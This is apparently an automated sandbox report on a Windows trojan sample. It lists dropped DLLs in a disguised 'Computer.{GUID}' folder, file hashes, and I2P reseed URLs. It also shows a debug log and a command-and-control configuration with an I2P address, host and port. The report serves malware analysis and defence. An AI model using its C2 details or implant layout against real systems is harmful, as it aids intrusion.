C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll | 0% | ReversingLabs | |
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll | 0% | ReversingLabs | |
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll | 0% | ReversingLabs | |
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exe | 3% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe | 19% | ReversingLabs | Win64.Trojan.Barys |
C:\Windows\Temp\T9229YlC | 0% | ReversingLabs | |
C:\Windows\Temp\TLbqzKsW | 0% | ReversingLabs | |
C:\Windows\Temp\UEptccWa | 0% | ReversingLabs | |
C:\Windows\Temp\VPIOcgIO | 0% | ReversingLabs | |
C:\Windows\Temp\e5xaOqBz | 0% | ReversingLabs | |
C:\Windows\Temp\fQQIqQM0 | 0% | ReversingLabs | |
C:\Windows\Temp\miECvZvT | 0% | ReversingLabs | |
C:\Windows\Temp\nHqxqt5L | 0% | ReversingLabs | |
C:\Windows\Temp\x8eec9dQ | 0% | ReversingLabs | |
No Antivirus matches
No Antivirus matches
https://login.microsoftonline.com/MSARST2.srf0%Avira URL Cloudsafe
http://Passport.NET/STS0%Avira URL Cloudsafe
https://reseed-pl.i2pd.xyz/0%Avira URL Cloudsafe
https://dev.ditu.live.com/mapcontrol/logging.ashx0%Avira URL Cloudsafe
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=0%Avira URL Cloudsafe
http://stats.i2p/cgi-bin/newhosts.txt0%Avira URL Cloudsafe
https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf%0%Avira URL Cloudsafe
http://127.0.0.1:81180%Avira URL Cloudsafe
https://reseed.stormycloud.org/W0%Avira URL Cloudsafe
https://login.microsoftonline.com/ppsecure/DeviceQuery.srf-0%Avira URL Cloudsafe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAA0%Avira URL Cloudsafe
http://docs.oasis-open.org/wss/280%Avira URL Cloudsafe
https://reseed.onion.im/0%Avira URL Cloudsafe
https://i2p.mooo.com/netDb/0%Avira URL Cloudsafe
http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd0%Avira URL Cloudsafe
https://reseed2.i2p.net/0%Avira URL Cloudsafe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd0%Avira URL Cloudsafe
https://login.microsoftonline.com/ppsecure/devicechangecredential.srfMM0%Avira URL Cloudsafe
https://reseed.stormycloud.org/c0%Avira URL Cloudsafe
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/0%Avira URL Cloudsafe
https://account.live.com/inlinesignup.aspx?iww=1&amp;id=806010%Avira URL Cloudsafe
https://signup.live.com/signup.aspx0%Avira URL Cloudsafe
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx0%Avira URL Cloudsafe
https://account.live.com/inlinesignup.aspx?iww=1&amp;id=806000%Avira URL Cloudsafe
http://schemas.xmlsoap.org/ws/2004/09/policy0%Avira URL Cloudsafe
https://dev.ditu.live.com/REST/v1/Transit/Stops/0%Avira URL Cloudsafe
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%Avira URL Cloudsafe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAAA0%Avira URL Cloudsafe
https://account.live.com/inlinesignup.aspx?iww=1&amp;id=806030%Avira URL Cloudsafe
https://reseed.i2p-projekt.de/0%Avira URL Cloudsafe
https://dev.virtualearth.net/REST/v1/Traffic/Incidents/0%Avira URL Cloudsafe
https://account.live.com/inlinesignup.aspx?iww=1&amp;id=806050%Avira URL Cloudsafe
http://reg.i2p/hosts.txtp/0%Avira URL Cloudsafe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
time.windows.com | unknown | unknown | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
      • Avira URL Cloud: safe
      unknown
      https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80600svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80603svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989069790.0000029864952000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://schemas.xmlsoap.org/ws/2004/09/policysvchost.exe, 00000028.00000003.2225363797.000002986496D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2236542045.000002986496E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2528003910.0000029864913000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2191080698.000002986490E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2528233861.000002986495F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2225212612.000002986490F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2169550030.000002986496E000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymoussvchost.exe, 00000028.00000002.2528121324.0000029864937000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAAAsvchost.exe, 00000028.00000003.2190886218.0000029864929000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 00000000.00000002.1366066074.000001A7F5088000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1364293809.000001A7F5086000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://reseed.i2p-projekt.de/yhar2he6rpt6n0h1w6rh.exe, 00000012.00000002.1546713788.00007FF70C31E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 0000001D.00000002.2203168945.0000027B43FE4000.00000004.00000020.00020000.00000000.sdmp, update.pkg.18.drfalse
      • Avira URL Cloud: safe
      unknown
      https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80605svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989069790.0000029864952000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 00000000.00000003.1364488310.000001A7F5062000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365876947.000001A7F5063000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365694389.000001A7F503F000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://reg.i2p/hosts.txtp/main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IP | Domain | Country | Flag | ASN | ASN Name | Malicious
      IP
      127.0.0.1
      Joe Sandbox version:41.0.0 Charoite
      Analysis ID:1517355
      Start date and time:2024-09-25 01:10:09 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 10m 13s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:43
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:file.exe
      Detection:MAL
      Classification:mal100.troj.evad.winEXE@57/74@1/52
      EGA Information:
      • Successful, ratio: 50%
      HCA Information:Failed
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
      • Excluded IPs from analysis (whitelisted): 20.101.57.9, 20.190.159.2, 20.190.159.71, 20.190.159.64, 40.126.31.73, 40.126.31.67, 20.190.159.68, 40.126.31.69, 20.190.159.23, 13.89.179.12
      • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, login.live.com, twc.trafficmanager.net, www.tm.v4.a.prd.aadg.akadns.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
      • Execution Graph export aborted for target file.exe, PID 3800 because there are no executed function
      • Execution Graph export aborted for target main.exe, PID 3260 because there are no executed function
      • Execution Graph export aborted for target yhar2he6rpt6n0h1w6rh.exe, PID 7704 because it is empty
      • Not all processes where analyzed, report is missing behavior information
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size exceeded maximum capacity and may have missing disassembly code.
      • Report size exceeded maximum capacity and may have missing network information.
      • Report size getting too big, too many NtCreateKey calls found.
      • VT rate limit hit for: file.exe
      Time | Type | Description
      19:11:08 | API Interceptor | 201x Sleep call for process: file.exe modified
      19:11:10 | API Interceptor | 49x Sleep call for process: powershell.exe modified
      20:31:00 | API Interceptor | 182492x Sleep call for process: main.exe modified
      20:31:06 | API Interceptor | 1x Sleep call for process: MpCmdRun.exe modified
      20:31:38 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                             Match | Associated Sample Name / URL | Detection | Threat Name
                             C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll | file.exe | malicious | Unknown
                             C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll | file.exe | malicious | Unknown
                             C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll | file.exe | malicious | Unknown
                                  Process:C:\Windows\System32\svchost.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):697182
                                  Entropy (8bit):5.235477364318322
                                  Encrypted:false
                                  SSDEEP:12288:3BXiKZWAAllNJheaP7Qata8BtcV3w6F6BM/vWjfLDxqq6A+kmfDUhbpEj2DDpr1C:v+
                                  MD5:80C0457FA69A2B910FB5B56703E8924A
                                  SHA1:64BCF793C777191E7EB87D808FE062E893FDBB4D
                                  SHA-256:315F5B687D4FA9473112BFBD3A2825A9A0B325A932F0D24F2A773688A38C11AC
                                  SHA-512:363B416C99552360C4F725B05D863AF91AF9AEC15016764AA22E2726DA1288B9C5D3EE9AE1953DA84B11D93EDA17570A6922A9904930E34F9D70E8419D5D8657
                                  Malicious:false
                                  Process:C:\Windows\System32\WerFault.exe
                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):0.9547345336309089
                                  Encrypted:false
                                  SSDEEP:96:gxFTJlKDac6ZsehMX7q9fwQXIDcQic6EcERcw3W3d+HbHg/opAnQzOqg7ThVMkQ1:MA2c6Z/d0MALS36jNAzuiFoZ24lO8l
                                  MD5:479B7DA9B6D81E37380E32A797749E82
                                  SHA1:0611B8AAC0E69B17AD7BC7277DF70F4BC4B60DA8
                                  SHA-256:2A1EF06568B844242D9446C1D30CD6FD4BEFBDA1BF3EF759B2E34CE99E23F81A
                                  SHA-512:EC8665B7A94C33DC274D2DE0EBAEDABE0DAE46A7A619E6C9635BD1720CEAD3CCF449C894BEC756318D2555D10B795594C5F4AA57F8A5956BB61577137EBCF43F
                                  Malicious:true
                                  Process:C:\Windows\System32\WerFault.exe
                                  File Type:Mini DuMP crash report, 15 streams, Wed Sep 25 00:31:17 2024, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):632198
                                  Entropy (8bit):0.9935101964449532
                                  Encrypted:false
                                  SSDEEP:768:QXLY8dXwMupyZBib/4V5v9LZyo6Y//kTW86ulpcWjHRsftyHdbqwnOJyOe6EME9h:QXUAK2kljyt49qwOJMLZ
                                  MD5:7A1FE490CFBFA5248B89E7A22076C3C7
                                  SHA1:9B80E5A26BD1636E70852B6A369680E0828328AC
                                  SHA-256:208F251F9CEC5765939A9B1A4E0106E6FFC2207CB61A836A7E962EE516AE1189
                                  SHA-512:22C100060BA0329183AE7C3DBB8AB6D246C93BC5BDBA96BAB420001913AD151ADD594384B9BEFA372BCC90E8EAAD5924E0407C8DB7FA7C7E00EAFB048FBEE4D8
                                  Malicious:false
                                  Process:C:\Windows\System32\WerFault.exe
                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):6730
                                  Entropy (8bit):3.720508413970361
                                  Encrypted:false
                                  SSDEEP:96:RSIU6o7wVetboT+pOYHV46NJ5aM4UB89bUoDo9fJcm:R6l7wVeJE+pOYHRprB89bUokfJcm
                                  MD5:2E4ADA9E7BC1D693DC1B2F2A8F1026E9
                                  SHA1:9F2AD178C964B1F253F0265F516D58042B4AB7EC
                                  SHA-256:75DF6A04A21557C96F8CC55EC6AF83773B6585F652AE3D76D6C587E67F3D3A8F
                                  SHA-512:73B4EE46C34AEA562038B8158A0BB54AF5B8824C705246E563524355A5FB37C498BBC76A424A8A1D65D11815CDDF9D3232A7D2FB3CAD982EA7E5730BE4974C7D
                                  Malicious:false
                                  Process:C:\Windows\System32\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4603
                                  Entropy (8bit):4.412705917287101
                                  Encrypted:false
                                  SSDEEP:48:cvIwWl8zsdJg771I9f0WpW8VYjIYm8M4JD2+AFbefiyq85/3s4p3Yiwd:uIjf3I7Et7VQJkefi1Y3Yiwd
                                  MD5:F403891A682708D3B6F256760C82260A
                                  SHA1:53121628AED4F9090A02B036DD0A472AB40E6E8A
                                  SHA-256:4C03A883649DE1767EFE1197AD2CA4CE9524D12AC7E8E6FCFAC3A7F110D51895
                                  SHA-512:0E4815D621E24358B718CADF368D395BC5008C2B0039682EB8607C26F0632F162D85B9B030BCCDFF548B772E5744A2AFE8D7940C6E95EFEB74B18892F673A03C
                                  Malicious:false
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="515013" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                  Process:C:\Windows\System32\svchost.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):81034
                                  Entropy (8bit):3.0786359586988734
                                  Encrypted:false
                                  SSDEEP:1536:GkIp9GCETdefnjs1KQSRsSkCc5VZ+z2u+u5vn+S+m+KJj5k+DD+lUao9:GkIp9GCETdefnjs1KQSRsSkCc5VZ+z2K
                                  MD5:82033D26D9F2AB4A4AC30A660CCE88A0
                                  SHA1:6EF8458E1A7EAA3866D40ADC767DE44DFA6D7418
                                  SHA-256:C46147F8E28FCC221F5873B0A21B98D533349EF8EA55AA3336815E0026767E10
                                  SHA-512:9389826C225FF5044CD6C2451BD989F6C124F81FA24552F46AE3B7F00B6801863E4256D72BDB6444C2ED6B65D412D0F343662C44C3A73A70C8F1634A33C38632
                                  Malicious:false
                                  Process:C:\Windows\System32\svchost.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):13340
                                  Entropy (8bit):2.6855112485147603
                                  Encrypted:false
                                  SSDEEP:96:TiZYWaA85nTD+oYoYoWbHZYEZ34tHi4V1KG9w+qvaWZrMEM7ITcUI3:2ZDaoof8uV0aWZrMEM0Tcb3
                                  MD5:77B0EFDD434A1472A6C9FCD1559364F2
                                  SHA1:46DE3A674460E9AA797DDB347413FE0F5F20664F
                                  SHA-256:399F88162FAEE0843A2C44CEB4DD66252E6153236F4F1D85D97D21908E967DB9
                                  SHA-512:54430129E8CBCF7C6E30133CA504563A9AE667BD32CA6858F7EF0C2E45576191AFA5D8222549A40CE9A851A002CB445CA0AADFEBDE21AF2E303DDB45181D5355
                                  Malicious:false
                                  Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                  Process:C:\Windows\System32\svchost.exe
                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):999
                                  Entropy (8bit):4.966299883488245
                                  Encrypted:false
                                  SSDEEP:24:Jd4T7gw4TchTGBLtKEHcHGuDyeHRuDye6MGFiP6euDyRtz:34T53VGLv8HGuDyeHRuDye6MGFiP6euy
                                  MD5:24567B9212F806F6E3E27CDEB07728C0
                                  SHA1:371AE77042FFF52327BF4B929495D5603404107D
                                  SHA-256:82F352AD3C9B3E58ECD3207EDC38D5F01B14D968DA908406BD60FD93230B69F6
                                  SHA-512:5D5E65FCD9061DADC760C9B3124547F2BABEB49FD56A2FD2FE2AD2211A1CB15436DB24308A0B5A87DA24EC6AB2A9B0C5242D828BE85BD1B2683F9468CE310904
                                  Malicious:false
                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<software_identification_tag xmlns="http://standards.iso.org/iso/19770/-2/2009/schema.xsd">...<entitlement_required_indicator>true</entitlement_required_indicator>...<product_title>Windows 10 Pro</product_title>...<product_version>....<name>10.0.19041.1865</name>....<numeric>.....<major>10</major>.....<minor>0</minor>.....<build>19041</build>.....<review>1865</review>....</numeric>...</product_version>...<software_creator>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</software_creator>...<software_licensor>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</software_licensor>...<software_id>....<unique_id>Windows-10-Pro</unique_id>....<tag_creator_regid>regid.1991-06.com.microsoft</tag_creator_regid>...</software_id>...<tag_creator>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</tag_creator>..</software_identification_tag>..
                                  Process:C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):456
                                  Entropy (8bit):3.2341395630162877
                                  Encrypted:false
                                  SSDEEP:12:Ml8Pi7t8+d/fQfjfEWNfElsfghFfShFfgmSem4emzYWr:k8APd/oj8i8ls0FSFgID7r
                                  MD5:40AB00517F4227F2C3C334F1D16B65B4
                                  SHA1:F8D57AF017E2209B4FB24122647FD7F71B67C87C
                                  SHA-256:4BAF4B78D05A28AF7DEE7DBBCE2B4EDF6053D9239C1756C932BE9F2FEEE4EF85
                                  SHA-512:75D74306F043B864295F09A60C19A43494C226664733C99318989CE5C22CB9395BB407FB5C8C0268AD9184A79813304ED5FC943A6B53DB54F5F225CDA31650E3
                                  Malicious:false
                                  Preview:C.o.m.p.u.t.e.r...{.2.0.d.0.4.f.e.0.-.3.a.e.a.-.1.0.6.9.-.a.2.d.8.-.0.8.0.0.2.b.3.0.3.0.9.d.}.....D.:.A.I.(.D.;.;.F.A.;.;.;.B.U.).(.A.;.;.F.A.;.;.;.B.A.).(.A.;.O.I.C.I.I.D.;.F.A.;.;.;.B.A.).(.A.;.I.D.;.F.A.;.;.;.S.Y.).(.A.;.O.I.C.I.I.O.I.D.;.F.A.;.;.;.C.O.).(.A.;.O.I.C.I.I.O.I.D.;.F.A.;.;.;.S.Y.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.I.U.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.S.U.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.S.-.1.-.5.-.3.).....
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):115200
                                  Entropy (8bit):6.220212606349767
                                  Encrypted:false
                                  SSDEEP:1536:GQTj0nA3CwwEWLUbltMR8tGZ9G+Yv953a6nfgXqobk5l:GQP02C7LUbltdQG+Yra64Xqo45l
                                  MD5:BE6174AE2B452DA9D00F9C7C4D8A675B
                                  SHA1:0ABD2C76C82416AE9C30124C43802E2E49C8ED28
                                  SHA-256:A62BDF318386AAAB93F1D25144CFBDC1A1125AAAD867EFC4E49FE79590181EBF
                                  SHA-512:5631B1595F8CEE8C0DFA991852259FEE17EA8B73A9EED900A10450BBB7C846ACFC88C32930BE379D60EFA6AE1BBBEAD0A605A9F36E20129B53BCA36B13BA5858
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Joe Sandbox View:
                                  • Filename: file.exe, Detection: malicious, Browse
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........."h.............................P......7F....`... .........................................^....................................@..l...........................@...(.......................h............................text...(...........................`..`.data........0......................@....rdata..`d...@...f...(..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B........................................................................................................................................................................
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):2847
                                  Entropy (8bit):5.5631076386293214
                                  Encrypted:false
                                  SSDEEP:48:CFdHW54yclD7hcm9FLZ4WU4bcPPu4bcPPTM94bcPPZ4bcPPA4bcPPL4bcPPcWIea:idH9NdJ9Vj3YPpYPTNYP6YPTYPcYPVPi
                                  MD5:C41CE339E2210FB9B0BF8195FE9990BF
                                  SHA1:4E20FCF72ECB77ED3658A1C62B1A03113E3D3705
                                  SHA-256:999CAB392C55F248FC97A09390BC311C9667FE836D063BEB1289414BB57AA27A
                                  SHA-512:B811141CF861B95B392E896E96A14CFBCB8BDCEC566DFBF7EFB548BBF5402BF99A136AB55CD845B6CCEB5264F9EFAAEE4C95FA4DA0C22C525C62C36D88230AC5
                                  Malicious:false
                                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffb2ce30000)..[D] (module_get_proc) -> Done(hnd=0x00007ffb2ce30000,name=RtlGetVersion,ret=0x00007ffb2ce6e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=39014b7a)..[I] (sys_init) -> Done(sys_uid=c76a8f0839014b7a,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[D] (ini_get_sec) -> Done(name=cnccli)..[D] (ini_get_var) -> Done(sec=cnccli,name=server_host,value=c
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:Generic INItialization configuration [cnccli]
                                  Category:dropped
                                  Size (bytes):214
                                  Entropy (8bit):5.0997449470012635
                                  Encrypted:false
                                  SSDEEP:6:1EVQLD4oeMuJO+70X1YIzODSVkXpTRL9gWVUDeLn:CjogJO+70X1YeCS2X9vgpKL
                                  MD5:26702FAAB91B6B144715714A96728F39
                                  SHA1:CBDC34FC8FD3559CD49475FB5BC76176A5F88FF8
                                  SHA-256:83D30846DD5576DE38A512B17163419D22FF35F2F5B0FE613C401E8A5A25B7A4
                                  SHA-512:50D35D3DCD60B6E57C1A277E6C3E7AFBB5C2B46425732FC5A9FD3C0A55FEBF5AB3F05411A83CEC230AAC40199774FF78F30848D57D1E04A11B9E60777B038289
                                  Malicious:false
                                  Preview:[main]..version=400004957b19a09d..[cnccli]..server_host=c21a8709..server_port=41674..server_timeo=15000..i2p_try_num=10..i2p_sam3_timeo=30000..i2p_addr=2lyi6mgj6tn4eexl6gwnujwfycmq7dcus2x42petanvpwpjlqrhq.b32.i2p..
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):104448
                                  Entropy (8bit):6.259370376612282
                                  Encrypted:false
                                  SSDEEP:1536:VQbC3TviBZTprAFnfkRAJhzTjvlsy2nD+cRi6ZQOobsAx34:VGC3TKBZTWJfImTjx2D+ei6ZQOkx34
                                  MD5:7A8E8A0842D8D65713DEE5393E806755
                                  SHA1:AF6F3A52009FBF62C21A290EFC34A94C151B683E
                                  SHA-256:51C131081921626D22FAF44977D5E4DCFE00E5D6CDDEDA877A82F13631BE7C2E
                                  SHA-512:D1B8D93B7EFBEAA348D3A01293AD5D92BC8F28EB2554DF5E6E71506D00D135390082C52C18D0BC3F0439B068777D8B2C43AAED930C72E5FFAB2593EEAC470CF4
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Joe Sandbox View:
                                  • Filename: file.exe, Detection: malicious, Browse
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\.........?..............................0............`... .........................................^.......................$............ ..l............................v..(.......................`............................text...............................`..`.data...............................@....rdata...a... ...b..................@..@.pdata..$............h..............@..@.xdata..T............r..............@..@.bss.... ................................edata..^............|..............@..@.idata...............~..............@....CRT....X...........................@....tls................................@....reloc..l.... ......................@..B........................................................................................................................................................................
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1021
                                  Entropy (8bit):5.446262796592905
                                  Encrypted:false
                                  SSDEEP:24:CFAGHS+5lGyclY7GfyE7Bf7cRE9FLxJN4Jw0ERYSXY+e:CFdHS+54yclD7hcm9FLZ4WX0
                                  MD5:3F3942419DA6A3A4B7F012F7195E68B1
                                  SHA1:2FD2223C796D4B4041016985863C02003619B7BA
                                  SHA-256:B45ABC2AAB871B3B330C99526750ABAAD3DF8B2C5684890D1B808E8258174568
                                  SHA-512:4D0516CFACEE777259E5E73B9790B23291D49983B155572E893F4C2B162FE0FDE073E710E415C1135CA81FD61E7A0B7E8F2DC6A6A982EBB19850D885DF5D9605
                                  Malicious:false
